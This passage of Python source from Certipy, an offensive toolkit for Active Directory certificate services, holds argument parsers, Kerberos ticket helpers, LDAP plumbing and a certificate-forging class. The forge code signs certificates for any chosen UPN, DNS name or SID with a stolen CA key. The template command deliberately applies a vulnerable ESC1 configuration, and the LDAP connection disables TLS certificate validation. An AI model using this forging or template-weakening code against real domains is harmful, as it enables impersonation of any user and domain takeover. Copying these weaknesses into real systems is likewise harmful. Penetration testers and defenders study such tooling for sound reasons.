NAME = "account"

import argparse
from typing import Callable, Tuple

from . import target


def entry(options: argparse.Namespace):
    from certipy.commands import account

    account.entry(options)


def add_subparser(subparsers: argparse._SubParsersAction) -> Tuple[str, Callable]:
    subparser = subparsers.add_parser(NAME, help="Manage user and machine accounts")

    subparser.add_argument("-debug", action="store_true", help="Turn debug output on")

    subparser.add_argument(
        "account_action",
        choices=["create", "read", "update", "delete"],
        help="Action",
    )

    group = subparser.add_argument_group("target")
    group.add_argument(
        "-user",
        action="store",
        metavar="SAM Account Name",
        help="Logon name for the account to target",
        required=True,
    )
    group.add_argument(
        "-group",
        action="store",
        metavar="CN=Computers,DC=test,DC=local",
        help="Group to which the account will be added."
        "If omitted, CN=Computers,<default path> will be used,",
    )
    group = subparser.add_argument_group("attribute options")
    group.add_argument(
        "-dns",
        action="store",
        metavar="Set the DNS host name for the account",
    )
    group.add_argument(
        "-upn",
        action="store",
        metavar="Set the UPN for the account",
    )
    group.add_argument(
        "-sam",
        action="store",
        metavar="Set the SAM Account Name for the account",
    )
    group.add_argument(
        "-spns",
        action="store",
        metavar="Set the SPNS for the account (comma-separated)",
    )
    group.add_argument(
        "-pass",
        action="store",
        dest="passw",
        metavar="Set the password for the account",
    )
    group = subparser.add_argument_group("connection options")
    group.add_argument(
        "-scheme",
        action="store",
        metavar="ldap scheme",
        choices=["ldap", "ldaps"],
        default="ldaps",
    )

    target.add_argument_group(subparser, connection_options=group)

    return NAME, entry



NAME = "ca"

import argparse
from typing import Callable, Tuple

from . import target


def entry(options: argparse.Namespace):
    from certipy.commands import ca

    ca.entry(options)


def add_subparser(subparsers: argparse._SubParsersAction) -> Tuple[str, Callable]:
    subparser = subparsers.add_parser(NAME, help="Manage CA and certificates")

    subparser.add_argument("-ca", action="store", metavar="certificate authority name")
    subparser.add_argument("-debug", action="store_true", help="Turn debug output on")

    group = subparser.add_argument_group("certificate template options")
    group.add_argument(
        "-enable-template",
        action="store",
        metavar="template name",
        help="Enable a certificate template on the CA",
    )
    group.add_argument(
        "-disable-template",
        action="store",
        metavar="template name",
        help="Disable a certificate template on the CA",
    )
    group.add_argument(
        "-list-templates",
        action="store_true",
        help="List enabled certificate templates on the CA",
    )

    group = subparser.add_argument_group("certificate request options")
    group.add_argument(
        "-issue-request",
        action="store",
        metavar="request ID",
        help="Issue a pending or failed certificate request",
    )
    group.add_argument(
        "-deny-request",
        action="store",
        metavar="request ID",
        help="Deny a pending certificate request",
    )

    group = subparser.add_argument_group("officer options")
    group.add_argument(
        "-add-officer",
        action="store",
        metavar="officer",
        help="Add a new officer (Certificate Manager) to the CA",
    )
    group.add_argument(
        "-remove-officer",
        action="store",
        metavar="officer",
        help="Remove an existing officer (Certificate Manager) from the CA",
    )

    group = subparser.add_argument_group("manager options")
    group.add_argument(
        "-add-manager",
        action="store",
        metavar="manager",
        help="Add a new manager (CA Manager) to the CA",
    )
    group.add_argument(
        "-remove-manager",
        action="store",
        metavar="manager",
        help="Remove an existing manager (CA Manager) from the CA",
    )

    group = subparser.add_argument_group("backup options")
    group.add_argument(
        "-backup",
        action="store_true",
        help="Backup CA certificate and private key",
    )
    group.add_argument(
        "-config",
        action="store",
        metavar="Machine\\CA",
    )

    group = subparser.add_argument_group("connection options")
    group.add_argument(
        "-scheme",
        action="store",
        metavar="ldap scheme",
        choices=["ldap", "ldaps"],
        default="ldaps",
    )
    group.add_argument(
        "-dynamic-endpoint",
        action="store_true",
        help="Prefer dynamic TCP endpoint over named pipe",
    )
    group.add_argument(
        "-dc-host",
        action="store",
        metavar="hostname",
        help="Hostname of the domain controller to use. "
        "If ommited, the domain part (FQDN) "
        "specified in the account parameter will be used",
    )

    target.add_argument_group(subparser, connection_options=group)

    return NAME, entry



import argparse
import datetime
from typing import Callable, Tuple

from certipy.lib.certificate import (
    PRINCIPAL_NAME,
    UTF8String,
    cert_id_to_parts,
    create_pfx,
    encoder,
    generate_rsa_key,
    get_subject_from_str,
    load_pfx,
    x509,
    asn1x509,
    NTDS_CA_SECURITY_EXT,
    szOID_NTDS_OBJECTSID
)
from certipy.lib.logger import logging


class Forge:
    def __init__(
        self,
        ca_pfx: str = None,
        upn: str = None,
        dns: str = None,
        sid: str = None,
        template: str = None,
        subject: str = None,
        issuer: str = None,
        crl: str = None,
        serial: str = None,
        key_size: int = 2048,
        out: str = None,
        **kwargs
    ):
        self.ca_pfx = ca_pfx
        self.alt_upn = upn
        self.alt_dns = dns
        self.alt_sid = sid
        self.template = template
        self.subject = subject
        self.issuer = issuer
        self.crl = crl
        self.serial = serial
        self.key_size = key_size
        self.out = out
        self.kwargs = kwargs

    def get_serial_number(self) -> int:
        serial_number = self.serial
        if serial_number is None:
            serial_number = x509.random_serial_number()
        else:
            serial_number = int(serial_number.replace(":", ""), 16)
        return serial_number

    def get_crl(self, crl: str = None) -> x509.CRLDistributionPoints:
        if crl is None:
            crl = self.crl
        if crl:
            return x509.CRLDistributionPoints(
                [
                    x509.DistributionPoint(
                        full_name=[x509.UniformResourceIdentifier(crl)],
                        relative_name=None,
                        reasons=None,
                        crl_issuer=None,
                    )
                ]
            )
        return None

    def forge(self):
        with open(self.ca_pfx, "rb") as f:
            ca_pfx = f.read()
        ca_key, ca_cert = load_pfx(ca_pfx)

        if self.alt_upn:
            id_type, id_value = "UPN", self.alt_upn
        else:
            id_type, id_value = "DNS Host Name", self.alt_dns

        if self.template is not None:
            with open(self.template, "rb") as f:
                tmp_pfx = f.read()
            key, tmp_cert = load_pfx(tmp_pfx)

            subject = self.subject
            if subject is None:
                subject = tmp_cert.subject
            else:
                subject = get_subject_from_str(self.subject)

            serial_number = self.serial
            if serial_number is None:
                serial_number = tmp_cert.serial_number
            else:
                serial_number = int(serial_number.replace(":", ""), 16)

            cert = x509.CertificateBuilder()
            cert = cert.subject_name(subject)
            if self.issuer:
                cert = cert.issuer_name(get_subject_from_str(self.issuer))
            else:
                cert = cert.issuer_name(ca_cert.subject)
            cert = cert.public_key(tmp_cert.public_key())
            cert = cert.serial_number(serial_number)
            cert = cert.not_valid_before(tmp_cert.not_valid_before)
            cert = cert.not_valid_after(tmp_cert.not_valid_after)

            cert = cert.add_extension(
                x509.AuthorityKeyIdentifier.from_issuer_public_key(ca_key.public_key()),
                False,
            )

            skip_extensions = [
                x509.AuthorityKeyIdentifier.oid,
                x509.SubjectAlternativeName.oid,
                x509.ExtendedKeyUsage.oid,
            ]

            crl = self.get_crl()
            if crl is not None:
                skip_extensions.append(x509.CRLDistributionPoints.oid)
                cert = cert.add_extension(crl, False)

            extensions = tmp_cert.extensions
            for extension in extensions:
                if extension.oid in skip_extensions:
                    continue
                cert = cert.add_extension(extension.value, extension.critical)

            signature_hash_algorithm = tmp_cert.signature_hash_algorithm.__class__
        else:
            key = generate_rsa_key(self.key_size)

            subject = self.subject
            if subject is None:
                subject = get_subject_from_str(
                    "CN=%s" % cert_id_to_parts([(id_type, id_value)])[0]
                )
            else:
                subject = get_subject_from_str(self.subject)

            serial_number = self.serial
            if serial_number is None:
                serial_number = x509.random_serial_number()
            else:
                serial_number = int(serial_number.replace(":", ""), 16)

            cert = x509.CertificateBuilder()
            cert = cert.subject_name(subject)
            if self.issuer:
                cert = cert.issuer_name(get_subject_from_str(self.issuer))
            else:
                cert = cert.issuer_name(ca_cert.subject)
            cert = cert.public_key(key.public_key())
            cert = cert.serial_number(serial_number)
            cert = cert.not_valid_before(
                datetime.datetime.utcnow() - datetime.timedelta(days=1)
            )
            cert = cert.not_valid_after(
                datetime.datetime.utcnow() + datetime.timedelta(days=365)
            )

            cert = cert.add_extension(
                x509.AuthorityKeyIdentifier.from_issuer_public_key(ca_key.public_key()),
                False,
            )

            cert = cert.add_extension(
                x509.SubjectKeyIdentifier.from_public_key(key.public_key()),
                False,
            )

            crl = self.get_crl()
            if crl is not None:
                cert = cert.add_extension(crl, False)

            signature_hash_algorithm = ca_cert.signature_hash_algorithm.__class__

        sans = []
        sans = []

        alt_dns = self.alt_dns
        if alt_dns:
            if type(alt_dns) == bytes:
                alt_dns = alt_dns.decode()

            sans.append(x509.DNSName(alt_dns))

        alt_upn = self.alt_upn
        if alt_upn:
            if type(alt_upn) == str:
                alt_upn = alt_upn.encode()
            alt_upn = encoder.encode(UTF8String(alt_upn))

            sans.append(x509.OtherName(PRINCIPAL_NAME, alt_upn))

        cert = cert.add_extension(
            x509.SubjectAlternativeName(sans),
            False,
        )

        alt_sid = self.alt_sid
        if alt_sid:
            if type(alt_sid) == str:
                alt_sid = alt_sid.encode()

            sid_extension = asn1x509.GeneralNames([asn1x509.GeneralName(
                    {
                        "other_name": asn1x509.AnotherName(
                            {
                                "type_id": szOID_NTDS_OBJECTSID,
                                "value": asn1x509.OctetString(alt_sid).retag(
                                    {"explicit": 0}
                                ),
                            }
                        )
                    }
                )]
            )

            cert = cert.add_extension(
                x509.UnrecognizedExtension(NTDS_CA_SECURITY_EXT, sid_extension.dump()),
                False,
            )

        cert = cert.sign(ca_key, signature_hash_algorithm())

        pfx = create_pfx(key, cert)

        out = self.out
        if not out:
            out, _ = cert_id_to_parts([(id_type, id_value)])
            out = "%s_forged.pfx" % out.rstrip("$").lower()

        with open(out, "wb") as f:
            f.write(pfx)

        logging.info("Saved forged certificate and private key to %s" % repr(out))


def entry(options: argparse.Namespace) -> None:
    if not options.upn and not options.dns:
        logging.error("Either -upn or -dns must be specified (or both)")
        return

    forge = Forge(
        **vars(options),
    )

    forge.forge()



NAME = "cert"

import argparse
from typing import Callable, Tuple


def entry(options: argparse.Namespace):
    from certipy.commands import cert

    cert.entry(options)


def add_subparser(subparsers: argparse._SubParsersAction) -> Tuple[str, Callable]:
    subparser = subparsers.add_parser(NAME, help="Manage certificates and private keys")

    subparser.add_argument(
        "-pfx", action="store", metavar="infile", help="Load PFX from file"
    )

    subparser.add_argument(
        "-password", action="store", metavar="password", help="Set import password"
    )

    subparser.add_argument(
        "-key", action="store", metavar="infile", help="Load private key from file"
    )

    subparser.add_argument(
        "-cert", action="store", metavar="infile", help="Load certificate from file"
    )

    subparser.add_argument("-export", action="store_true", help="Output PFX file")

    subparser.add_argument(
        "-out", action="store", metavar="outfile", help="Output filename"
    )

    subparser.add_argument(
        "-nocert",
        action="store_true",
        help="Don't output certificate",
    )

    subparser.add_argument(
        "-nokey", action="store_true", help="Don't output private key"
    )

    subparser.add_argument("-debug", action="store_true", help="Turn debug output on")

    return NAME, entry



import pkg_resources
from impacket import __path__

try:
    version = pkg_resources.get_distribution("certipy-ad").version
except pkg_resources.DistributionNotFound:
    version = "?"
    print(
        "Cannot determine Certipy version. "
        'If running from source you should at least run "python setup.py egg_info"'
    )
BANNER = "Certipy v{} - by Oliver Lyak (ly4k)\n".format(version)



NAME = "template"

import argparse
from typing import Callable, Tuple

from . import target


def entry(options: argparse.Namespace):
    from certipy.commands import template

    template.entry(options)


def add_subparser(subparsers: argparse._SubParsersAction) -> Tuple[str, Callable]:
    subparser = subparsers.add_parser(NAME, help="Manage certificate templates")

    subparser.add_argument(
        "-template", action="store", metavar="template name", required=True
    )
    subparser.add_argument("-debug", action="store_true", help="Turn debug output on")

    group = subparser.add_argument_group("configuration options")
    group.add_argument(
        "-configuration",
        action="store",
        metavar="configuration file",
        help="Configuration to apply to the certificate template. If omitted, a default vulnerable configuration (ESC1) will be applied. Useful for restoring an old configuration",
    )
    group.add_argument(
        "-save-old",
        action="store_true",
        help="Save the old configuration",
    )

    group = subparser.add_argument_group("connection options")
    group.add_argument(
        "-scheme",
        action="store",
        metavar="ldap scheme",
        choices=["ldap", "ldaps"],
        default="ldaps",
    )

    target.add_argument_group(subparser, connection_options=group)

    return NAME, entry



import datetime
import os
from typing import Tuple

from impacket.krb5 import constants
from impacket.krb5.asn1 import AP_REQ, TGS_REP, Authenticator, seq_set
from impacket.krb5.ccache import CCache
from impacket.krb5.crypto import Key
from impacket.krb5.kerberosv5 import KerberosError, getKerberosTGS, getKerberosTGT
from impacket.krb5.types import KerberosTime, Principal, Ticket
from impacket.spnego import SPNEGO_NegTokenInit, TypesMech
from pyasn1.codec.ber import decoder, encoder
from pyasn1.type.univ import noValue

from certipy.lib.logger import logging
from certipy.lib.target import Target


def get_TGS(
    target: Target,
    target_name,
    service: str = "host",
) -> Tuple[bytes, type, Key, str, str]:
    # Modified version of impacket.krb5.kerberosv5.getKerberosType1 to just return the tgs

    username = target.username
    password = target.password
    domain = target.domain
    lmhash = target.lmhash
    nthash = target.nthash
    aes_key = target.aes
    kdc_host = target.dc_ip

    # Convert to binary form, just in case we're receiving strings
    if isinstance(lmhash, str):
        try:
            lmhash = bytes.fromhex(lmhash)
        except TypeError:
            pass
    if isinstance(nthash, str):
        try:
            nthash = bytes.fromhex(nthash)
        except TypeError:
            pass
    if isinstance(aes_key, str):
        try:
            aes_key = bytes.fromhex(aes_key)
        except TypeError:
            pass

    TGT = None
    TGS = None

    if target.use_sspi:
        from certipy.lib.sspi import get_tgt

        server_name = "%s/%s" % (service, target_name)

        logging.debug("Trying to get TGS for %s via SSPI" % repr(server_name))
        ccache = get_tgt(server_name)

        TGT = ccache.credentials[0].toTGT()
    else:
        try:
            ccache = CCache.loadFile(os.getenv("KRB5CCNAME"))
        except Exception:
            # No cache present
            pass
        if ccache:
            # retrieve domain information from CCache file if needed
            ccache_domain = ccache.principal.realm["data"].decode("utf-8")

            if domain == "":
                domain = ccache_domain
                logging.debug("Domain retrieved from CCache: %s" % domain)

            ccache_username = "/".join(
                map(lambda x: x["data"].decode(), ccache.principal.components)
            )

            logging.debug("Using Kerberos Cache: %s" % os.getenv("KRB5CCNAME"))
            principal = "%s/%s@%s" % (service, target_name.upper(), domain.upper())
            creds = ccache.getCredential(principal, anySPN=False)
            if creds is None:
                # Let's try for the TGT and go from there
                principal = "krbtgt/%s@%s" % (domain.upper(), domain.upper())
                creds = ccache.getCredential(principal)
                if creds is not None:
                    TGT = creds.toTGT()
                    logging.debug("Using TGT from cache")
                else:
                    logging.debug("No valid credentials found in cache. ")
            else:
                TGS = creds.toTGS(principal)

            # retrieve user information from CCache file if needed
            if creds is not None:
                ccache_username = (
                    creds["client"].prettyPrint().split(b"@")[0].decode("utf-8")
                )
                logging.debug("Username retrieved from CCache: %s" % ccache_username)
            elif len(ccache.principal.components) > 0:
                ccache_username = ccache.principal.components[0]["data"].decode("utf-8")
                logging.debug("Username retrieved from CCache: %s" % ccache_username)

            if ccache_username.lower() != username.lower():
                logging.warning(
                    "Username %s does not match username in CCache %s"
                    % (repr(username), repr(ccache_username))
                )
                TGT = None
                TGS = None
            else:
                username = ccache_username

            if ccache_domain.lower() != domain.lower():
                logging.warning(
                    "Domain %s does not match domain in CCache %s"
                    % (repr(domain), repr(ccache_domain))
                )

    # First of all, we need to get a TGT for the user
    username = Principal(username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
    while True:
        if TGT is None:
            if TGS is None:
                try:
                    logging.debug(
                        "Getting TGT for %s" % repr("%s@%s" % (username, domain))
                    )
                    tgt, cipher, _, session_key = getKerberosTGT(
                        username, password, domain, lmhash, nthash, aes_key, kdc_host
                    )
                    logging.debug("Got TGT for %s" % repr("%s@%s" % (username, domain)))
                except KerberosError as e:
                    if (
                        e.getErrorCode()
                        == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value
                    ):
                        # We might face this if the target does not support AES
                        # So, if that's the case we'll force using RC4 by converting
                        # the password to lm/nt hashes and hope for the best. If that's already
                        # done, byebye.
                        if (
                            lmhash == b""
                            and nthash == b""
                            and (aes_key == b"" or aes_key is None)
                            and TGT is None
                            and TGS is None
                        ):
                            from impacket.ntlm import compute_lmhash, compute_nthash

                            logging.debug("Got KDC_ERR_ETYPE_NOSUPP, fallback to RC4")
                            lmhash = compute_lmhash(password)
                            nthash = compute_nthash(password)
                            continue
                        else:
                            raise
                    else:
                        raise

        else:
            tgt = TGT["KDC_REP"]
            cipher = TGT["cipher"]
            session_key = TGT["sessionKey"]

        # Now that we have the TGT, we should ask for a TGS for cifs

        if TGS is None:
            server_name = Principal(
                "%s/%s" % (service, target_name),
                type=constants.PrincipalNameType.NT_SRV_INST.value,
            )
            try:
                logging.debug(
                    "Getting TGS for %s" % repr("%s/%s" % (service, target_name))
                )
                tgs, cipher, _, session_key = getKerberosTGS(
                    server_name, domain, kdc_host, tgt, cipher, session_key
                )

                logging.debug("Got TGS for %s" % repr("%s/%s" % (service, target_name)))
            except KerberosError as e:
                if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
                    # We might face this if the target does not support AES
                    # So, if that's the case we'll force using RC4 by converting
                    # the password to lm/nt hashes and hope for the best. If that's already
                    # done, byebye.
                    if (
                        lmhash == b""
                        and nthash == b""
                        and (aes_key == b"" or aes_key is None)
                        and TGT is None
                        and TGS is None
                    ):
                        from impacket.ntlm import compute_lmhash, compute_nthash

                        logging.debug("Got KDC_ERR_ETYPE_NOSUPP, fallback to RC4")
                        lmhash = compute_lmhash(password)
                        nthash = compute_nthash(password)
                    else:
                        raise
                else:
                    raise
            else:
                break
        else:
            tgs = TGS["KDC_REP"]
            cipher = TGS["cipher"]
            session_key = TGS["sessionKey"]
            break

    ticket = decoder.decode(tgs, asn1Spec=TGS_REP())[0]

    client_name = Principal()
    client_name.from_asn1(ticket, "crealm", "cname")

    username = "@".join(str(client_name).split("@")[:-1])
    domain = client_name.realm

    return tgs, cipher, session_key, username, domain


def get_kerberos_type1(
    target: Target,
    target_name: str = "",
    service: str = "host",
) -> Tuple[type, Key, bytes]:
    tgs, cipher, session_key, username, domain = get_TGS(target, target_name, service)

    principal = Principal(username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)

    blob = SPNEGO_NegTokenInit()

    blob["MechTypes"] = [TypesMech["MS KRB5 - Microsoft Kerberos 5"]]

    tgs = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
    ticket = Ticket()
    ticket.from_asn1(tgs["ticket"])

    ap_req = AP_REQ()
    ap_req["pvno"] = 5
    ap_req["msg-type"] = int(constants.ApplicationTagNumbers.AP_REQ.value)

    opts = []
    ap_req["ap-options"] = constants.encodeFlags(opts)
    seq_set(ap_req, "ticket", ticket.to_asn1)

    authenticator = Authenticator()
    authenticator["authenticator-vno"] = 5
    authenticator["crealm"] = domain
    seq_set(authenticator, "cname", principal.components_to_asn1)
    now = datetime.datetime.utcnow()

    authenticator["cusec"] = now.microsecond
    authenticator["ctime"] = KerberosTime.to_asn1(now)

    encoded_authenticator = encoder.encode(authenticator)

    encrypted_encoded_authenticator = cipher.encrypt(
        session_key, 11, encoded_authenticator, None
    )

    ap_req["authenticator"] = noValue
    ap_req["authenticator"]["etype"] = cipher.enctype
    ap_req["authenticator"]["cipher"] = encrypted_encoded_authenticator

    blob["MechToken"] = encoder.encode(ap_req)

    return cipher, session_key, blob.getData(), username



# Impacket - Collection of Python classes for working with network protocols.
#
# SECUREAUTH LABS. Copyright (C) 2019 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
#   This logger is intended to be used by impacket instead
#   of printing directly. This will allow other libraries to use their
#   custom logging implementation.
#

import logging as _logging
import sys

# This module can be used by scripts using the Impacket library
# in order to configure the root logger to output events
# generated by the library with a predefined format

# If the scripts want to generate log entries, they can write
# directly to the root logger (logging.info, debug, etc).


class ImpacketFormatter(_logging.Formatter):
    """
    Prefixing logged messages through the custom attribute 'bullet'.
    """

    def __init__(self):
        _logging.Formatter.__init__(self, "%(bullet)s %(message)s", None)

    def format(self, record):
        if record.levelno == _logging.INFO:
            record.bullet = "[*]"
        elif record.levelno == _logging.DEBUG:
            record.bullet = "[+]"
        elif record.levelno == _logging.WARNING:
            record.bullet = "[!]"
        else:
            record.bullet = "[-]"

        return _logging.Formatter.format(self, record)


class ImpacketFormatterTimeStamp(ImpacketFormatter):
    """
    Prefixing logged messages through the custom attribute 'bullet'.
    """

    def __init__(self):
        _logging.Formatter.__init__(
            self, "[%(asctime)-15s] %(bullet)s %(message)s", None
        )

    def formatTime(self, record, datefmt=None):
        return ImpacketFormatter.formatTime(self, record, datefmt="%Y-%m-%d %H:%M:%S")


def init(ts=False):
    # We add a StreamHandler and formatter to the root logger
    handler = _logging.StreamHandler(sys.stdout)
    if not ts:
        handler.setFormatter(ImpacketFormatter())
    else:
        handler.setFormatter(ImpacketFormatterTimeStamp())
    _logging.getLogger("certipy").addHandler(handler)
    _logging.getLogger("certipy").setLevel(_logging.INFO)
    _logging.getLogger("certipy").propagate = False


logging = _logging.getLogger("certipy")



import ssl
from typing import Any, List, Union

import ldap3
from certipy.lib.constants import WELLKNOWN_SIDS
from certipy.lib.kerberos import get_kerberos_type1
from certipy.lib.logger import logging
from certipy.lib.target import Target
from ldap3.core.results import RESULT_STRONGER_AUTH_REQUIRED
from ldap3.protocol.microsoft import security_descriptor_control


# https://github.com/fox-it/BloodHound.py/blob/d665959c58d881900378040e6670fa12f801ccd4/bloodhound/ad/utils.py#L216
def get_account_type(entry: "LDAPEntry"):
    account_type = entry.get("sAMAccountType")
    if account_type in [268435456, 268435457, 536870912, 536870913]:
        return "Group"
    elif entry.get("msDS-GroupMSAMembership"):
        return "User"
    elif account_type in [805306369]:
        return "Computer"
    elif account_type in [805306368]:
        return "User"
    elif account_type in [805306370]:
        return "trustaccount"
    else:
        return "Domain"


class LDAPEntry(dict):
    def get(self, key):
        if key not in self.__getitem__("attributes").keys():
            return None
        item = self.__getitem__("attributes").__getitem__(key)

        if isinstance(item, list) and len(item) == 0:
            return None

        return item

    def set(self, key, value):
        return self.__getitem__("attributes").__setitem__(key, value)

    def get_raw(self, key):
        if key not in self.__getitem__("raw_attributes").keys():
            return None
        return self.__getitem__("raw_attributes").__getitem__(key)


class LDAPConnection:
    def __init__(self, target: Target, scheme: str = "ldaps"):
        self.target = target
        self.scheme = scheme
        if self.scheme == "ldap":
            self.port = 389
        elif self.scheme == "ldaps":
            self.port = 636

        self.default_path: str = None
        self.configuration_path: str = None
        self.ldap_server: ldap3.Server = None
        self.ldap_conn: ldap3.Connection = None
        self.domain: str = None

        self.sid_map = {}

        self._machine_account_quota = None
        self._domain_sid = None
        self._users = {}
        self._user_sids = {}

    def connect(self, version: ssl._SSLMethod = None) -> None:
        user = "%s\\%s" % (self.target.domain, self.target.username)

        if version is None:
            try:
                self.connect(version=ssl.PROTOCOL_TLSv1_2)
            except ldap3.core.exceptions.LDAPSocketOpenError as e:
                if self.scheme != "ldaps":
                    logging.warning(
                        "Got error while trying to connecto to LDAP: %s" % e
                    )
                self.connect(version=ssl.PROTOCOL_TLSv1)
            return
        else:
            if self.scheme == "ldaps":
                tls = ldap3.Tls(validate=ssl.CERT_NONE, version=version,
                                ciphers='ALL:@SECLEVEL=0')
                ldap_server = ldap3.Server(
                    self.target.target_ip,
                    use_ssl=True,
                    port=self.port,
                    get_info=ldap3.ALL,
                    tls=tls,
                    connect_timeout=self.target.timeout,
                )
            else:
                ldap_server = ldap3.Server(
                    self.target.target_ip,
                    use_ssl=False,
                    port=self.port,
                    get_info=ldap3.ALL,
                    connect_timeout=self.target.timeout,
                )

            logging.debug("Authenticating to LDAP server")

            if self.target.do_kerberos or self.target.use_sspi:
                ldap_conn = ldap3.Connection(
                    ldap_server, receive_timeout=self.target.timeout * 10
                )
                self.LDAP3KerberosLogin(ldap_conn)
            else:
                if self.target.hashes is not None:
                    ldap_pass = "%s:%s" % (self.target.lmhash, self.target.nthash)
                else:
                    ldap_pass = self.target.password
                ldap_conn = ldap3.Connection(
                    ldap_server,
                    user=user,
                    password=ldap_pass,
                    authentication=ldap3.NTLM,
                    auto_referrals=False,
                    receive_timeout=self.target.timeout * 10,
                )

        if not ldap_conn.bound:
            bind_result = ldap_conn.bind()
            if not bind_result:
                result = ldap_conn.result
                if (
                    result["result"] == RESULT_STRONGER_AUTH_REQUIRED
                    and self.scheme == "ldap"
                ):
                    logging.warning(
                        "LDAP Authentication is refused because LDAP signing is enabled. "
                        "Trying to connect over LDAPS instead..."
                    )
                    self.scheme = "ldaps"
                    self.port = 636
                    return self.connect()
                else:
                    if result["description"] == "invalidCredentials":
                        raise Exception(
                            "Failed to authenticate to LDAP. Invalid credentials"
                        )
                    raise Exception(
                        "Failed to authenticate to LDAP: (%s) %s"
                        % (result["description"], result["message"])
                    )

        if ldap_server.schema is None:
            ldap_server.get_info_from_server(ldap_conn)

            if ldap_conn.result["result"] != 0:
                if ldap_conn.result["message"].split(":")[0] == "000004DC":
                    raise Exception(
                        "Failed to bind to LDAP. This is most likely because of an invalid username specified for logon"
                    )

            if ldap_server.schema is None:
                raise Exception("Failed to get LDAP schema")

        logging.debug("Bound to %s" % ldap_server)

        self.ldap_conn = ldap_conn
        self.ldap_server = ldap_server

        self.default_path = self.ldap_server.info.other["defaultNamingContext"][0]
        self.configuration_path = self.ldap_server.info.other[
            "configurationNamingContext"
        ][0]

        logging.debug("Default path: %s" % self.default_path)
        logging.debug("Configuration path: %s" % self.configuration_path)
        self.domain = self.ldap_server.info.other["ldapServiceName"][0].split("@")[-1]

    def LDAP3KerberosLogin(self, connection: ldap3.Connection) -> bool:
        _, _, blob, username = get_kerberos_type1(
            self.target,
            target_name=self.target.remote_name,
        )

        request = ldap3.operation.bind.bind_operation(
            connection.version,
            ldap3.SASL,
            username,
            None,
            "GSS-SPNEGO",
            blob,
        )

        if connection.closed:
            connection.open(read_server_info=True)

        connection.sasl_in_progress = True
        response = connection.post_send_single_response(
            connection.send("bindRequest", request, None)
        )
        connection.sasl_in_progress = False
        if response[0]["result"] != 0:
            raise Exception(response)

        connection.bound = True

        return True

    def add(self, *args, **kwargs) -> Any:
        self.ldap_conn.add(*args, **kwargs)
        return self.ldap_conn.result

    def delete(self, *args, **kwargs) -> Any:
        self.ldap_conn.delete(*args, **kwargs)
        return self.ldap_conn.result

    def modify(self, *args, **kwargs) -> Any:
        self.ldap_conn.modify(*args, **kwargs)
        return self.ldap_conn.result

    def search(
        self,
        search_filter: str,
        attributes: Union[str, List[str]] = ldap3.ALL_ATTRIBUTES,
        search_base: str = None,
        query_sd: bool = False,
        **kwargs
    ) -> List["LDAPEntry"]:
        if search_base is None:
            search_base = self.default_path

        if query_sd:
            controls = security_descriptor_control(sdflags=0x5)
        else:
            controls = None

        results = self.ldap_conn.extend.standard.paged_search(
            search_base=search_base,
            search_filter=search_filter,
            attributes=attributes,
            controls=controls,
            paged_size=200,
            generator=True,
            **kwargs
        )

        if self.ldap_conn.result["result"] != 0:
            logging.warning(
                "LDAP search %s failed: (%s) %s"
                % (
                    repr(search_filter),
                    self.ldap_conn.result["description"],
                    self.ldap_conn.result["message"],
                )
            )
            return []

        entries = list(
            map(
                lambda entry: LDAPEntry(**entry),
                filter(
                    lambda entry: entry["type"] == "searchResEntry",
                    results,
                ),
            )
        )
        return entries

    def get_user(
        self, username: str, silent: bool = False, *args, **kwargs
    ) -> LDAPEntry:
        def _get_user(username, *args, **kwargs):
            sanitized_username = username.lower().strip()
            if sanitized_username in self._users:
                return self._users[sanitized_username]

            results = self.search("(sAMAccountName=%s)" % username, *args, **kwargs)
            if len(results) != 1:
                return None

            self._users[sanitized_username] = results[0]

            return results[0]

        user = _get_user(username, *args, **kwargs)
        if user is None:
            user = _get_user(username + "$")

        if user is None and silent is False:
            logging.error("Could not find user %s" % repr(username))

        return user

    @property
    def machine_account_quota(self):
        if self._machine_account_quota is not None:
            return self._machine_account_quota
        results = self.search(
            "(objectClass=domain)",
            attributes=[
                "ms-DS-MachineAccountQuota",
            ],
        )
        if len(results) != 1:
            return 0

        result = results[0]
        machine_account_quota = result.get("ms-DS-MachineAccountQuota")
        if machine_account_quota is None:
            machine_account_quota = 0

        self._machine_account_quota = machine_account_quota

        return machine_account_quota

    @property
    def domain_sid(self):
        if self._domain_sid is not None:
            return self._domain_sid

        results = self.search(
            "(objectClass=domain)",
            attributes=[
                "objectSid",
            ],
        )
        if len(results) != 1:
            return None

        result = results[0]
        domain_sid = result.get("objectSid")
        if domain_sid is None:
            domain_sid = None

        self._domain_sid = domain_sid

        return domain_sid

    def get_user_sids(self, username: str):
        sanitized_username = username.lower().strip()
        if sanitized_username in self._user_sids:
            return self._user_sids[sanitized_username]

        user = self.get_user(username)

        sids = set()

        sids.add(user.get("objectSid"))

        # Everyone, Authenticated Users, Users
        sids |= set(["S-1-1-0", "S-1-5-11", "S-1-5-32-545"])

        # Domain Users, Domain Computers, etc.
        primary_group_id = user.get("primaryGroupID")
        if primary_group_id is not None:
            sids.add("%s-%d" % (self.domain_sid, primary_group_id))

        # Add Domain Computers group
        logging.debug(
            "Adding Domain Computers to list of current user's SIDs"
        )
        sids.add("%s-515" % self.domain_sid)

        dns = [user.get("distinguishedName")]
        for sid in sids:
            object = self.lookup_sid(sid)
            if "dn" in object:
                dns.append(object["dn"])

        member_of_queries = []
        for dn in dns:
            member_of_queries.append("(member:1.2.840.113556.1.4.1941:=%s)" % dn)

        try:
            # Nested Group Membership
            groups = self.search(
                "(|%s)" % "".join(member_of_queries),
                attributes="objectSid",
            )
        except Exception as e:
            logging.warning("Failed to get user SIDs. Try increasing -timeout")
            return sids

        for group in groups:
            sid = group.get("objectSid")
            if sid is not None:
                sids.add(sid)

        self._user_sids[sanitized_username] = sids

        return sids

    def lookup_sid(self, sid: str) -> LDAPEntry:
        if sid in self.sid_map:
            return self.sid_map[sid]

        if sid in WELLKNOWN_SIDS:
            return LDAPEntry(
                **{
                    "attributes": {
                        "objectSid": "%s-%s" % (self.domain.upper(), sid),
                        "objectType": WELLKNOWN_SIDS[sid][1].capitalize(),
                        "name": "%s\\%s" % (self.domain, WELLKNOWN_SIDS[sid][0]),
                    }
                }
            )

        attributes = [
            "sAMAccountType",
            "name",
